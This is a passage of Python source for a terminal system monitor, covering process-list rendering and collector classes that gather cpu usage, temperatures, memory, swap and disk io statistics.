(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
	'''Data collector master class
	* .start(): Starts collector thread
	* .stop(): Stops collector thread
	* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
	stopping: bool = False			#? Set True to make the _runner loop exit
	started: bool = False			#? True while the collector thread is alive
	draw_now: bool = False			#? Whether _runner should push buffers to screen after collecting
	redraw: bool = False
	only_draw: bool = False			#? Skip _collect() and only redraw from cached data
	thread: threading.Thread
	collect_run = threading.Event()		#? Signals _runner to process the queue
	collect_idle = threading.Event()	#? Set while _runner is NOT processing (collect() waits on this)
	collect_idle.set()
	collect_done = threading.Event()	#? Set when a full collect+draw pass has finished
	collect_queue: List = []
	collect_interrupt: bool = False		#? Abort flag checked between queued collectors
	proc_interrupt: bool = False		#? Abort flag specific to the process collector
	use_draw_list: bool = False		#? Draw only the buffers of explicitly queued collectors
	proc_counter: int = 1			#? Counter used to throttle ProcCollector via CONFIG.proc_update_mult
	@classmethod
	def start(cls):
		'''Start the background collector thread running _runner().'''
		cls.stopping = False
		cls.thread = threading.Thread(target=cls._runner, args=())
		cls.thread.start()
		cls.started = True
	@classmethod
	def stop(cls):
		'''Signal the collector thread to stop and join it; events are set to
		release anything blocked on them.'''
		if cls.started and cls.thread.is_alive():
			cls.stopping = True
			cls.started = False
			cls.collect_queue = []
			cls.collect_idle.set()
			cls.collect_done.set()
			try:
				cls.thread.join()
			except:
				pass
	@classmethod
	def _runner(cls):
		'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
		draw_buffers: List[str] = []
		debugged: bool = False
		try:
			while not cls.stopping:
				if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
				#? Poll with a timeout so the stopping flag is re-checked regularly
				cls.collect_run.wait(0.1)
				if not cls.collect_run.is_set():
					continue
				draw_buffers = []
				cls.collect_interrupt = False
				#? Clear run/idle/done: we are now busy until the queue is drained
				cls.collect_run.clear()
				cls.collect_idle.clear()
				cls.collect_done.clear()
				if DEBUG and not debugged: TimeIt.start("Collect and draw")
				while cls.collect_queue:
					collector = cls.collect_queue.pop()
					if not cls.only_draw:
						collector._collect()
					collector._draw()
					if cls.use_draw_list: draw_buffers.append(collector.buffer)
					if cls.collect_interrupt: break
				if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
				if cls.draw_now and not Menu.active and not cls.collect_interrupt:
					if cls.use_draw_list: Draw.out(*draw_buffers)
					else: Draw.out()
				if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
				cls.collect_idle.set()
				cls.collect_done.set()
		except Exception as e:
			errlog.exception(f'Data collection thread failed with exception: {e}')
			#? Release waiters before quitting so the main thread isn't left blocked
			cls.collect_idle.set()
			cls.collect_done.set()
			clean_quit(1, thread=True)
	@classmethod
	def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
		'''Setup collect queue for _runner'''
		cls.collect_interrupt = interrupt
		cls.proc_interrupt = proc_interrupt
		#? Wait for any in-progress pass to finish before swapping the queue
		cls.collect_idle.wait()
		cls.collect_interrupt = False
		cls.proc_interrupt = False
		cls.use_draw_list = False
		cls.draw_now = draw_now
		cls.redraw = redraw
		cls.only_draw = only_draw
		if collectors:
			#? Explicit collectors given: draw only their buffers
			cls.collect_queue = [*collectors]
			cls.use_draw_list = True
			if ProcCollector in cls.collect_queue:
				cls.proc_counter = 1
		else:
			#? No args: queue every Collector subclass, throttling ProcCollector
			#? to run once every CONFIG.proc_update_mult passes
			cls.collect_queue = list(cls.__subclasses__())
			if CONFIG.proc_update_mult > 1:
				if cls.proc_counter > 1:
					cls.collect_queue.remove(ProcCollector)
				if cls.proc_counter == CONFIG.proc_update_mult:
					cls.proc_counter = 0
				cls.proc_counter += 1
		cls.collect_run.set()
class CpuCollector(Collector):
	'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
	cpu_usage: List[List[int]] = []		#? [0] = total usage history, [1..THREADS] = per-thread history
	cpu_upper: List[int] = []		#? History for the configurable upper cpu graph
	cpu_lower: List[int] = []		#? History for the configurable lower cpu graph
	cpu_temp: List[List[int]] = []		#? [0] = package temp history, [1..THREADS] = per-thread temps
	cpu_temp_high: int = 0			#? "High" temp threshold reported by sensor (or fallback)
	cpu_temp_crit: int = 0			#? "Critical" temp threshold reported by sensor (or fallback)
	for _ in range(THREADS + 1):
		cpu_usage.append([])
		cpu_temp.append([])
	freq_error: bool = False		#? Ensures the frequency read error is only logged once
	cpu_freq: int = 0
	load_avg: List[float] = []
	uptime: str = ""
	buffer: str = CpuBox.buffer
	sensor_method: str = ""			#? One of "", "psutil", "coretemp", "osx-cpu-temp", "vcgencmd"
	got_sensors: bool = False
	sensor_swap: bool = False
	cpu_temp_only: bool = False		#? True when only a package temp (no per-core temps) is available
	@classmethod
	def get_sensors(cls):
		'''Check if we can get cpu temps and return method of getting temps'''
		cls.sensor_method = ""
		if SYSTEM == "MacOS":
			try:
				#? Prefer the coretemp binary, fall back to osx-cpu-temp
				if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
					cls.sensor_method = "coretemp"
				elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
					cls.sensor_method = "osx-cpu-temp"
			except: pass
		elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
			#? User picked a specific sensor from the detected list
			cls.sensor_method = "psutil"
		elif hasattr(psutil, "sensors_temperatures"):
			try:
				temps = psutil.sensors_temperatures()
				if temps:
					#? Accept any sensor whose name or entry label looks cpu-related
					for name, entries in temps.items():
						if name.lower().startswith("cpu"):
							cls.sensor_method = "psutil"
							break
						for entry in entries:
							if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
								cls.sensor_method = "psutil"
								break
			except: pass
		if not cls.sensor_method and SYSTEM == "Linux":
			try:
				#? Raspberry Pi fallback
				if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
					cls.sensor_method = "vcgencmd"
			except: pass
		cls.got_sensors = bool(cls.sensor_method)
	@classmethod
	def _collect(cls):
		'''Sample cpu usage (total, per-thread, upper/lower graph modes), frequency,
		load average and uptime; optionally collect temperatures.'''
		cls.cpu_usage[0].append(ceil(psutil.cpu_percent(percpu=False)))
		#? Histories are trimmed relative to terminal width so graphs never starve
		if len(cls.cpu_usage[0]) > Term.width * 4:
			del cls.cpu_usage[0][0]

		cpu_times_percent = psutil.cpu_times_percent()
		for x in ["upper", "lower"]:
			#? "total" reuses the combined usage list; any other value is the name
			#? of a psutil cpu_times_percent field (user, system, iowait, ...)
			if getattr(CONFIG, "cpu_graph_" + x) == "total":
				setattr(cls, "cpu_" + x, cls.cpu_usage[0])
			else:
				getattr(cls, "cpu_" + x).append(ceil(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
			if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
				del getattr(cls, "cpu_" + x)[0]

		for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
			cls.cpu_usage[n].append(ceil(thread))
			if len(cls.cpu_usage[n]) > Term.width * 2:
				del cls.cpu_usage[n][0]
		try:
			if CONFIG.show_cpu_freq and hasattr(psutil.cpu_freq(), "current"):
				freq: float = psutil.cpu_freq().current
				#? Values <= 10 are assumed to be GHz and converted to MHz
				cls.cpu_freq = round(freq * (1 if freq > 10 else 1000))
			elif cls.cpu_freq > 0:
				cls.cpu_freq = 0
		except Exception as e:
			if not cls.freq_error:
				cls.freq_error = True
				errlog.error("Exception while getting cpu frequency!")
				errlog.exception(f'{e}')
			else:
				pass
		cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
		cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")

		if CONFIG.check_temp and cls.got_sensors:
			cls._collect_temps()
	@classmethod
	def _collect_temps(cls):
		'''Collect cpu package and per-core temperatures using the method picked by
		get_sensors(), mapping core temps onto logical threads via CORE_MAP.
		Disables temp collection (got_sensors = False) on any failure.'''
		temp: int = 1000	#? Sentinel: stays 1000 until a package temp is found
		cores: List[int] = []
		core_dict: Dict[int, int] = {}
		entry_int: int = 0
		cpu_type: str = ""	#? "intel", "ryzen" or "other" depending on matched labels
		c_max: int = 0
		s_name: str = "_-_"
		s_label: str = "_-_"
		if cls.sensor_method == "psutil":
			try:
				if CONFIG.cpu_sensor != "Auto":
					#? User-selected sensor is stored as "name:label"
					s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
				for name, entries in psutil.sensors_temperatures().items():
					for num, entry in enumerate(entries, 1):
						if name == s_name and (entry.label == s_label or str(num) == s_label):
							#? Exact match on user-selected sensor entry
							if entry.label.startswith("Package"):
								cpu_type = "intel"
							elif entry.label.startswith("Tdie"):
								cpu_type = "ryzen"
							else:
								cpu_type = "other"
							if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
							else: cls.cpu_temp_high = 80
							if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
							else: cls.cpu_temp_crit = 95
							temp = round(entry.current)
						elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current"):
							#? Auto mode: package-level sensor (Intel "Package", AMD "Tdie")
							if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
								cls.sensor_swap = False
								if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
								else: cls.cpu_temp_high = 80
								if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
								else: cls.cpu_temp_crit = 95
							cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
							temp = round(entry.current)
						elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current"):
							#? Per-core sensor entries
							if entry.label.startswith(("Core", "Tccd")):
								entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
								if entry_int in core_dict and cpu_type != "ryzen":
									#? Duplicate core index: assume a second socket/package and
									#? offset by the first package's core count
									if c_max == 0:
										c_max = max(core_dict) + 1
									if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
										core_dict[(entry_int + c_max)] = round(entry.current)
									continue
								elif entry_int in core_dict:
									continue
								core_dict[entry_int] = round(entry.current)
								continue
							elif cpu_type in ["intel", "ryzen"]:
								continue
							if not cpu_type:
								#? Generic cpu sensor without a recognized package label
								cpu_type = "other"
								if not cls.cpu_temp_high or cls.sensor_swap:
									cls.sensor_swap = False
									if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
									else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
									if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
									else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
								temp = round(entry.current)
							cores.append(round(entry.current))
				if core_dict:
					#? Per-core temps found: derive a package temp if none was reported
					if not temp or temp == 1000:
						temp = sum(core_dict.values()) // len(core_dict)
					if not cls.cpu_temp_high or not cls.cpu_temp_crit:
						cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
					cls.cpu_temp[0].append(temp)
					if cpu_type == "ryzen":
						#? Ryzen reports one Tccd sensor per CCD; spread each CCD temp
						#? over its cores — assumes cores divide evenly over CCDs
						ccds: int = len(core_dict)
						cores_per_ccd: int = CORES // ccds
						z: int = 1
						for x in range(THREADS):
							if x == CORES:
								z = 1
							if CORE_MAP[x] + 1 > cores_per_ccd * z:
								z += 1
							if z in core_dict:
								cls.cpu_temp[x+1].append(core_dict[z])
					else:
						for x in range(THREADS):
							if CORE_MAP[x] in core_dict:
								cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])

				elif len(cores) == THREADS / 2:
					#? One temp per physical core: mirror onto hyperthread siblings
					cls.cpu_temp[0].append(temp)
					for n, t in enumerate(cores, start=1):
						try:
							cls.cpu_temp[n].append(t)
							cls.cpu_temp[THREADS // 2 + n].append(t)
						except IndexError:
							break

				else:
					cls.cpu_temp[0].append(temp)
					if len(cores) > 1:
						for n, t in enumerate(cores, start=1):
							try:
								cls.cpu_temp[n].append(t)
							except IndexError:
								break
			except Exception as e:
				errlog.exception(f'{e}')
				cls.got_sensors = False
				CpuBox._calc_size()

		else:
			try:
				if cls.sensor_method == "coretemp":
					temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
					cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
					if len(cores) == THREADS / 2:
						#? Mirror physical-core temps onto hyperthread siblings
						cls.cpu_temp[0].append(temp)
						for n, t in enumerate(cores, start=1):
							try:
								cls.cpu_temp[n].append(t)
								cls.cpu_temp[THREADS // 2 + n].append(t)
							except IndexError:
								break
					else:
						cores.insert(0, temp)
						for n, t in enumerate(cores):
							try:
								cls.cpu_temp[n].append(t)
							except IndexError:
								break
					if not cls.cpu_temp_high:
						cls.cpu_temp_high = 85
						cls.cpu_temp_crit = 100
				elif cls.sensor_method == "osx-cpu-temp":
					#? Output ends with "°C" — strip the two trailing chars
					temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
					if not cls.cpu_temp_high:
						cls.cpu_temp_high = 85
						cls.cpu_temp_crit = 100
				elif cls.sensor_method == "vcgencmd":
					#? Output looks like "temp=42.8'C" — slice out the number
					temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
					if not cls.cpu_temp_high:
						cls.cpu_temp_high = 60
						cls.cpu_temp_crit = 80
			except Exception as e:
				errlog.exception(f'{e}')
				cls.got_sensors = False
				CpuBox._calc_size()
			else:
				if not cores:
					cls.cpu_temp[0].append(temp)

		if not core_dict and len(cores) <= 1:
			cls.cpu_temp_only = True
		#? Trim all temp histories in lockstep once the package history exceeds 5
		if len(cls.cpu_temp[0]) > 5:
			for n in range(len(cls.cpu_temp)):
				if cls.cpu_temp[n]:
					del cls.cpu_temp[n][0]
	@classmethod
	def _draw(cls):
		'''Hand off drawing to the cpu box.'''
		CpuBox._draw_fg()
class MemCollector(Collector):
    '''Collects memory and disks information'''
    values: Dict[str, int] = {}
    vlist: Dict[str, List[int]] = {}
    percent: Dict[str, int] = {}
    string: Dict[str, str] = {}
    swap_values: Dict[str, int] = {}
    swap_vlist: Dict[str, List[int]] = {}
    swap_percent: Dict[str, int] = {}
    swap_string: Dict[str, str] = {}
    disks: Dict[str, Dict]
    disk_hist: Dict[str, Tuple] = {}  #* Previous read/write byte counters per disk, for io speed deltas
    timestamp: float = time()  #* Time of previous collection, for io speed deltas
    disks_io_dict: Dict[str, Dict[str, List[int]]] = {}  #* Io graph history per disk
    recheck_diskutil: bool = True
    diskutil_map: Dict[str, str] = {}  #* MacOS: maps physical disk names to container names from diskutil
    io_error: bool = False
    old_disks: List[str] = []
    old_io_disks: List[str] = []
    fstab_filter: List[str] = []
    excludes: List[str] = ["squashfs", "nullfs"]
    if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
    buffer: str = MemBox.buffer
    @classmethod
    def _collect(cls):
        '''Collect memory and swap usage plus, if enabled, disk usage and io speeds.'''
        #* Collect memory
        mem = psutil.virtual_memory()
        if hasattr(mem, "cached"):
            cls.values["cached"] = mem.cached
        else:
            #* Platform has no "cached" field, fall back to "active"
            cls.values["cached"] = mem.active
        cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
        cls.values["used"] = cls.values["total"] - cls.values["available"]
        for key, value in cls.values.items():
            cls.string[key] = floating_humanizer(value)
            if key == "total": continue
            cls.percent[key] = round(value * 100 / cls.values["total"])
            if CONFIG.mem_graphs:
                if not key in cls.vlist: cls.vlist[key] = []
                cls.vlist[key].append(cls.percent[key])
                if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
        #* Collect swap
        if CONFIG.show_swap or CONFIG.swap_disk:
            swap = psutil.swap_memory()
            cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
            cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
            if swap.total:
                if not MemBox.swap_on:
                    MemBox.redraw = True
                    MemBox.swap_on = True
                for key, value in cls.swap_values.items():
                    cls.swap_string[key] = floating_humanizer(value)
                    if key == "total": continue
                    cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
                    if CONFIG.mem_graphs:
                        if not key in cls.swap_vlist: cls.swap_vlist[key] = []
                        cls.swap_vlist[key].append(cls.swap_percent[key])
                        if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
            else:
                if MemBox.swap_on:
                    MemBox.redraw = True
                MemBox.swap_on = False
        else:
            if MemBox.swap_on:
                MemBox.redraw = True
            MemBox.swap_on = False
        if not CONFIG.show_disks: return
        #* Collect disks usage
        disk_read: int = 0
        disk_write: int = 0
        dev_name: str
        disk_name: str
        filtering: Tuple = ()
        filter_exclude: bool = False
        io_string_r: str
        io_string_w: str
        u_percent: int
        cls.disks = {}
        if CONFIG.disks_filter:
            if CONFIG.disks_filter.startswith("exclude="):
                filter_exclude = True
                filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
            else:
                filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
        try:
            io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
        except ValueError as e:
            if not cls.io_error:
                cls.io_error = True
                errlog.error('Non fatal error during disk io collection!')
                if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
                    errlog.error('Caused by outdated psutil version.')
                errlog.exception(f'{e}')
            io_counters = None
        if SYSTEM == "MacOS" and cls.recheck_diskutil:
            cls.recheck_diskutil = False
            try:
                #* Map physical disks to their containers so io counters can be matched to mountpoints
                dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
                xdisk = ydisk = ""  #* Initialized so a "Container" line before a "/dev/" line can't reference an unbound name
                for line in dutil_out.split("\n"):
                    line = line.replace("\u2068", "").replace("\u2069", "")
                    if line.startswith("/dev/"):
                        xdisk = line.split()[0].replace("/dev/", "")
                    elif "Container" in line:
                        ydisk = line.split()[3]
                    if xdisk and ydisk:
                        cls.diskutil_map[xdisk] = ydisk
                        xdisk = ydisk = ""
            except Exception:
                pass
        if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
            try:
                with open('/etc/fstab','r') as fstab:
                    for line in fstab:
                        line = line.strip()
                        if line and not line.startswith('#'):
                            mount_data = (line.split())
                            if mount_data[2].lower() != "swap":
                                cls.fstab_filter += [mount_data[1]]
                errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
            except IOError:
                CONFIG.use_fstab = False
                errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
        if not CONFIG.use_fstab and cls.fstab_filter:
            cls.fstab_filter = []
            errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
        for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
            disk_io = None
            io_string_r = io_string_w = ""
            if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
                continue
            disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
            if cls.excludes and disk.fstype in cls.excludes:
                continue
            if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
                continue
            if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
                continue
            try:
                disk_u = psutil.disk_usage(disk.mountpoint)
            except Exception:
                #* Fix: skip disks whose usage can't be read (permissions, stale mounts);
                #* previously execution fell through with disk_u unbound or stale from the previous disk
                continue
            u_percent = round(getattr(disk_u, "percent", 0))
            cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
            for name in ["total", "used", "free"]:
                cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
            #* Collect disk io
            if io_counters:
                try:
                    if SYSTEM != "BSD":
                        dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
                        if not dev_name in io_counters:
                            for names in io_counters:
                                if names in dev_name:
                                    disk_io = io_counters[names]
                                    break
                            else:
                                #* No direct match; on MacOS try the diskutil physical->container map
                                if cls.diskutil_map:
                                    for names, items in cls.diskutil_map.items():
                                        if items in dev_name and names in io_counters:
                                            disk_io = io_counters[names]
                        else:
                            disk_io = io_counters[dev_name]
                    elif disk.mountpoint == "/":
                        #* BSD gives one totals object; assign it to the root disk only
                        disk_io = io_counters
                    else:
                        raise Exception
                    disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
                    disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
                    if not disk.device in cls.disks_io_dict:
                        cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
                    cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
                    cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
                    cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
                    if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
                        del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
                except Exception:
                    #* First sample for this disk (no history yet) or unmatched io counters
                    disk_read = disk_write = 0
            else:
                disk_read = disk_write = 0
            if disk_io:
                cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
                if CONFIG.io_mode or MemBox.disks_width > 30:
                    if disk_read > 0:
                        io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
                    if disk_write > 0:
                        io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
                    if CONFIG.io_mode:
                        cls.disks[disk.device]["io_r"] = io_string_r
                        cls.disks[disk.device]["io_w"] = io_string_w
                elif disk_read + disk_write > 0:
                    io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
            cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
        if CONFIG.swap_disk and MemBox.swap_on:
            cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
            for name in ["total", "used", "free"]:
                cls.disks["__swap"][name] = cls.swap_string[name]
            if len(cls.disks) > 2:
                try:
                    #* Reorder so the swap pseudo-disk appears right after the first (root) disk
                    new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
